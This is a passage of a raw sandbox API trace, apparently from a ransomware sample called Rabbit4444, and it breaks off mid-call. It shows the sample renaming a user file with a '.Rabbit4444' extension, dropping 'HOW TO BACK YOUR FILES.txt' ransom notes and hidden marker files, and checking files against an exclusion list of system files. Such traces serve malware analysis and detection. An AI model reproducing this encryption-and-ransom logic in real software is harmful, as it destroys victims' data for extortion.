[0064.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0064.825] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10000, lpName=0x0) returned 0x27c [0064.825] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x70000 [0064.828] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101380) returned 1 [0064.828] CryptGenRandom (in: hProv=0x101380, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0064.828] CryptReleaseContext (hProv=0x101380, dwFlags=0x0) returned 1 [0064.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e0d0 [0064.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0d0 | out: hHeap=0xe0000) returned 1 [0064.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0064.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e0d0 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0d0 | out: hHeap=0xe0000) returned 1 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0064.892] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15620314557) returned 1 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0064.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0064.893] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.893] CloseHandle (hObject=0x27c) returned 1 [0064.893] CloseHandle (hObject=0x2a0) returned 1 [0064.894] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\UnifiedTileCache.dat.Rabbit4444") returned 132 [0064.894] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\UnifiedTileCache.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\unifiedtilecache.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\UnifiedTileCache.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\unifiedtilecache.dat.rabbit4444"), dwFlags=0x1) returned 1 [0064.895] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ab0f83, ftCreationTime.dwHighDateTime=0x1d4d5d0, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0x26df83f3, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0xfcfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UnifiedTileCache.dat", cAlternateFileName="UNIFIE~1.DAT")) returned 0 [0064.895] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.895] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.895] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.895] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.895] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.897] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.897] CloseHandle (hObject=0x2a0) returned 1 [0064.897] CloseHandle (hObject=0x2cc) returned 1 [0064.897] GetCurrentThreadId () returned 0xd98 [0064.897] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0064.897] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData" [0064.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0064.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0064.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData" [0064.897] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\" [0064.897] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0064.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.899] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.902] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.902] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.903] CloseHandle (hObject=0x2cc) returned 1 [0064.905] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData") returned 104 [0064.905] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ae5d2a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd5ae5d2a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf00116b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0064.905] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.905] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.905] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.905] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.905] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ae5d2a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd5ae5d2a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf00116b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.905] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.905] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.905] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.905] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.905] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.905] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf00116b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf00116b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00116b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.905] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.905] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.905] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf00116b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf00116b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00116b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.905] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0064.906] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.906] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.906] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.907] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.907] CloseHandle (hObject=0x2a0) returned 1 [0064.907] CloseHandle (hObject=0x2cc) returned 1 [0064.907] GetCurrentThreadId () returned 0xd98 [0064.907] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0064.907] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings" [0064.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116450 | out: hHeap=0xe0000) returned 1 [0064.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0064.907] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings" [0064.907] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\" [0064.907] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0064.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.908] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.910] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.911] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.912] CloseHandle (hObject=0x2cc) returned 1 [0064.912] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings") returned 99 [0064.912] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.912] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0037aa9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.912] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.912] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.912] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.912] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.912] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0037aa9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.912] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.912] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.913] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.913] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.913] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.913] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0037aa9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0037aa9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0037aa9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.913] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.913] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.913] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6dd2b9, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8a6dd2b9, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x8a6dd2b9, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0064.913] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0064.913] lstrcpyW (in: lpString1=0x130ec00, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0064.913] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0064.914] lstrlenW (lpString="roaming.lock") returned 12 [0064.914] lstrlenW (lpString="Rabbit4444") returned 10 [0064.914] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0064.914] lstrlenW (lpString=".dll") returned 4 [0064.914] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0064.914] lstrlenW (lpString=".lnk") returned 4 [0064.914] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0064.914] lstrlenW (lpString=".ini") returned 4 [0064.914] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0064.914] lstrlenW (lpString=".sys") returned 4 [0064.914] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0064.914] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6b7054, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xa94540a6, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xa94540a6, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0064.914] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0064.914] lstrcpyW (in: lpString1=0x130ec00, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0064.914] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0064.915] lstrlenW (lpString="settings.dat") returned 12 [0064.915] lstrlenW (lpString="Rabbit4444") returned 10 [0064.915] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0064.915] lstrlenW (lpString=".dll") returned 4 [0064.915] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.915] lstrlenW (lpString=".lnk") returned 4 [0064.915] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.915] lstrlenW (lpString=".ini") returned 4 [0064.915] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.915] lstrlenW (lpString=".sys") returned 4 [0064.915] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0064.915] GetLastError () returned 0x20 [0064.915] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat _CreateFile error 32\r\n") returned 143 [0064.915] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat _CreateFile error 32\r\n") returned 143 [0064.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.915] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x103d [0064.916] WriteFile (in: hFile=0x2a0, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x8f, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x8f, lpOverlapped=0x0) returned 1 [0064.917] CloseHandle (hObject=0x2a0) returned 1 [0064.917] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0064.917] CloseHandle (hObject=0x0) returned 0 [0064.917] CloseHandle (hObject=0xffffffff) returned 1 [0064.918] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2aae8a9, ftCreationTime.dwHighDateTime=0x1d32714, 